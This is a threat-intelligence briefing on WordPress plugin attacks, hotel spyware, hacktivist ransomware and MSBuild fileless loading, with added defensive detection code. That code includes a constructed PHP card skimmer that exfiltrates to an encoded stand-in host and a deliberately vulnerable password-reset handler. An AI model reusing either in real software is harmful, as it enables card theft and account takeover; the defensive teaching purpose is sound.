Cyware Daily Threat Intelligence

Daily Threat Briefing • May 23, 2024
WordPress plugins under attack! Cybercriminals were spotted abusing a legitimate code-snippet plugin to inject obfuscated PHP malware that steals credit card details from a WooCommerce store's checkout. Meanwhile, another WordPress plugin, UserPro, was found to contain a critical vulnerability that let unauthenticated attackers reset other users' passwords. The plugin is installed on more than 20,000 sites; users should update to version 5.1.9 immediately.
In other headlines, the spyware app pcTattletale was found capturing hotel guest data and then leaking it through a security hole of its own. Marketed for remote monitoring, the app had been installed on check-in systems at three Wyndham hotels in the U.S.
Commodity spyware exposed sensitive guest data
A consumer-grade spyware app, pcTattletale, has been discovered on check-in systems at three Wyndham hotels in the U.S. The app, marketed for remote monitoring, captured screenshots of the check-in software that contained sensitive information such as guest names and partial payment card numbers, and a security flaw in the spyware's own infrastructure left those screenshots publicly accessible.
Code-snippet plugin abused to skim credit card data
Attackers abused the little-known Dessky Snippets WordPress plugin, which exists to let site owners add custom PHP, to plant server-side skimming code in a WooCommerce store. The obfuscated PHP hooks the checkout billing form, modifies it to capture card details, and posts the captured data to a third-party URL; it also disables browser autocomplete on the injected fields so that no autofill prompt draws the shopper's attention.
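A practical follow-up to the skimmer described above is a scan of every PHP file and every stored snippet for the combination of traits it exhibits: a WooCommerce checkout hook, card-shaped field names, autocomplete switched off, an outbound call, and obfuscation. The scanner below is an added example written for this briefing, not Sucuri's tooling or the real malware; the indicator names, weights, threshold and both PHP samples are constructed for illustration.

```python
import re

# Constructed heuristic: each entry is (name, pattern, weight). Names, patterns and
# weights are this example's assumptions, tuned so one legitimate hook alone does not alert.
INDICATORS = [
    ("hooks_checkout_billing", re.compile(r"woocommerce_(?:after|before)_checkout_billing_form"), 3),
    ("injects_card_fields", re.compile(r"card[-_ ]?number|cvv|cvc|expir", re.I), 2),
    ("autocomplete_off", re.compile(r"autocomplete\s*=\s*['\"]?off", re.I), 2),
    ("exfil_call", re.compile(r"\b(?:curl_exec|file_get_contents|wp_remote_post|fsockopen)\s*\(", re.I), 2),
    ("external_url", re.compile(r"https?://[A-Za-z0-9.-]+\.[a-z]{2,}", re.I), 1),
    ("obfuscation", re.compile(r"\b(?:base64_decode|gzinflate|str_rot13|eval)\s*\(", re.I), 3),
    ("reads_billing_post", re.compile(r"\$_POST\s*\[\s*['\"]billing_", re.I), 1),
]
SUSPICIOUS_AT = 6  # a lone checkout hook scores 3; hook + exfil + obfuscation scores 8


def scan_php(source: str) -> dict:
    """Score one PHP source string (a file or a snippet stored in the database) against INDICATORS."""
    hits = [name for name, pattern, _ in INDICATORS if pattern.search(source)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return {"hits": hits, "score": score, "suspicious": score >= SUSPICIOUS_AT}


# Constructed sample in the style of the skimmer described above; it is NOT the real malware.
# The exfiltration URL is base64-encoded, which is why a plain URL grep is not enough.
SKIMMER_SNIPPET = """<?php
add_action('woocommerce_after_checkout_billing_form', function ($checkout) {
    echo '<input type="text" name="billing_card_number" autocomplete="off">';
    echo '<input type="text" name="billing_cvv" autocomplete="off">';
});
add_action('woocommerce_checkout_process', function () {
    $data = array('card' => $_POST['billing_card_number'], 'cvv' => $_POST['billing_cvv']);
    $ch = curl_init(base64_decode('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvY29sbGVjdA=='));
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_exec($ch);
});
"""

# Constructed benign snippet using the same hook, to show the rule does not fire on it.
BENIGN_SNIPPET = """<?php
add_action('woocommerce_after_checkout_billing_form', function ($checkout) {
    echo '<p class="notice">Delivery takes two to four business days.</p>';
});
"""

if __name__ == "__main__":
    for label, code in (("skimmer", SKIMMER_SNIPPET), ("benign", BENIGN_SNIPPET)):
        print(label, scan_php(code))
```

Run it against the contents of the snippet plugin's stored options as well as the theme and plugin directories: with a snippet plugin the malicious code never has to touch the filesystem, so a file-only integrity check can miss it entirely.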
Ransomware repurposed for political agendas
SentinelOne researchers described a shift in tactics among hacktivist-leaning groups that increasingly deploy ransomware to disrupt Philippine entities and draw attention to political causes. Groups such as Ikaruz Red Team (IRT), Turk Hack Team, and Anka Underground build their payloads from leaked ransomware builders and hijack the branding of government bodies such as CERT-PH, blending cyberattacks with regional geopolitical tensions.
Fileless infection method by Unfading Sea Haze
Bitdefender uncovered a covert operation by the elusive Unfading Sea Haze threat actor, which achieves fileless execution by abusing MSBuild to run malicious code directly in memory. The group's arsenal spans keyloggers and Gh0stRAT variants, and it pairs commercial RMM tools with custom exfiltration methods to slip past traditional defenses.
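MSBuild can compile and execute code from a project file in memory, which is what makes it a fileless loader; the defender's handle on that is process telemetry. Below is an added example, not Bitdefender's detection and not tied to any specific Unfading Sea Haze sample, that triages process-creation records for MSBuild launched on a project file in a user-writable location or from a non-build parent. The field names loosely follow Sysmon Event ID 1, and the path list, parent allow-list and all three records are constructed for this example.

```python
import re
from pathlib import PureWindowsPath

# Locations an unprivileged user or a dropper can write to; a build tool reading its
# project from one of these is the living-off-the-land pattern (list is an assumption).
USER_WRITABLE = re.compile(r"^[a-z]:\\(?:users\\|programdata\\|windows\\temp\\|perflogs\\)", re.I)
# Parents that legitimately launch MSBuild on a developer or build host (assumption; baseline yours).
BUILD_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe", "vbcscompiler.exe", "nuget.exe"}
PROJECT_EXT = re.compile(r"\.(?:csproj|vbproj|proj|xml|targets)$", re.I)


def _project_args(command_line: str) -> list:
    """Quoted or bare command-line arguments that look like MSBuild project files."""
    tokens = [quoted or bare for quoted, bare in re.findall(r'"([^"]+)"|(\S+)', command_line)]
    return [t for t in tokens if PROJECT_EXT.search(t)]


def assess_msbuild_event(event: dict) -> dict:
    """Return {'msbuild': bool, 'reasons': [...], 'alert': bool} for one process-creation record."""
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    if image != "msbuild.exe":
        return {"msbuild": False, "reasons": [], "alert": False}
    parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
    projects = _project_args(event.get("CommandLine", ""))
    reasons = []
    if any(USER_WRITABLE.match(p) for p in projects):
        reasons.append("project_in_user_writable_path")
    if parent not in BUILD_PARENTS:
        reasons.append("unusual_parent:" + parent)
    # Alert when the project sits where a dropper would put it, or when a non-build
    # parent (shell, Office, browser) hands MSBuild a project file at all.
    alert = "project_in_user_writable_path" in reasons or (parent not in BUILD_PARENTS and bool(projects))
    return {"msbuild": True, "reasons": reasons, "alert": alert}


def triage(events: list) -> list:
    """Index and reasons for every record that trips the rule."""
    results = ((i, assess_msbuild_event(e)) for i, e in enumerate(events))
    return [{"index": i, "reasons": r["reasons"]} for i, r in results if r["alert"]]


# Constructed records for this example; not real telemetry.
EVENTS = [
    {   # loader pattern: MSBuild run from a shell on an XML "project" dropped in a public folder
        "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
        "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" C:\Users\Public\Libraries\update.xml',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # ordinary IDE build
        "Image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
        "CommandLine": r'MSBuild.exe "D:\src\app\app.csproj" /t:Build',
        "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
    },
    {   # unrelated process
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

if __name__ == "__main__":
    print(triage(EVENTS))
```

On a developer workstation the unusual-parent branch will fire for builds kicked off from a terminal, so scope that branch to non-developer hosts or pair it with the user-writable-path condition; the path condition alone is the higher-fidelity signal.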
Critical bug found in UserPro plugin
The UserPro plugin by DeluxeThemes, used by more than 20,000 WordPress sites to build user profiles and community portals, contained a critical vulnerability tracked as CVE-2024-35700. Discovered by Patchstack, the flaw sits in the password-reset path of the userpro_process_form function: because the "secret key" that authorizes a reset was not handled properly, an unauthenticated attacker could, under certain conditions, change another user's password and take over the account. The fix ships in version 5.1.9.
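The page does not show UserPro's code, so the following is an added, hypothetical Python illustration of the bug class rather than the plugin's logic: a reset handler that compares the submitted secret key to whatever is stored without first checking that a key was ever issued, beside a hardened handler. The store layout, function names, the 15-minute lifetime and the empty-key condition are this example's assumptions, not details taken from Patchstack's advisory.

```python
import hmac
import secrets
import time

RESET_TTL_SECONDS = 15 * 60  # assumption for this example


def make_store() -> dict:
    """Constructed in-memory user table; 'secret_key' is None until a reset is requested."""
    return {
        "alice": {"password": "hunter2", "secret_key": None, "secret_issued": None},  # never asked for a reset
    }


def request_reset(users: dict, username: str, now=None) -> str:
    """Issue a fresh single-use reset key; in a real flow it is mailed to the account owner."""
    token = secrets.token_urlsafe(32)
    users[username]["secret_key"] = token
    users[username]["secret_issued"] = time.time() if now is None else now
    return token


def reset_password_vulnerable(users: dict, username: str, secret_key: str, new_password: str) -> bool:
    """Bug class: no check that a key was ever issued. Coercing an unset key to ''
    (PHP's loose comparison treats null == '' the same way) means anyone who submits an
    empty key can reset the password of every user with no pending reset."""
    user = users.get(username)
    if user is None:
        return False
    stored = user["secret_key"] or ""
    if stored != secret_key:
        return False
    user["password"] = new_password
    return True


def reset_password_hardened(users: dict, username: str, secret_key: str, new_password: str, now=None) -> bool:
    """Reject when no reset is pending or the submission is empty, enforce a lifetime,
    compare in constant time, and burn the key on success so it is single-use."""
    user = users.get(username)
    if user is None or not user["secret_key"] or not secret_key:
        return False
    now = time.time() if now is None else now
    if now - user["secret_issued"] > RESET_TTL_SECONDS:
        return False
    if not hmac.compare_digest(secret_key, user["secret_key"]):
        return False
    user["password"] = new_password
    user["secret_key"] = None
    user["secret_issued"] = None
    return True


if __name__ == "__main__":
    store = make_store()
    print("vulnerable, empty key:", reset_password_vulnerable(store, "alice", "", "pwned"))
    store = make_store()
    print("hardened, empty key:", reset_password_hardened(store, "alice", "", "pwned"))
```

The same four checks (pending-reset, non-empty input, expiry, single use) apply whether the key is stored in plaintext, as here, or as a hash; storing only a hash of the token is an additional improvement that this example leaves out to keep the comparison readable.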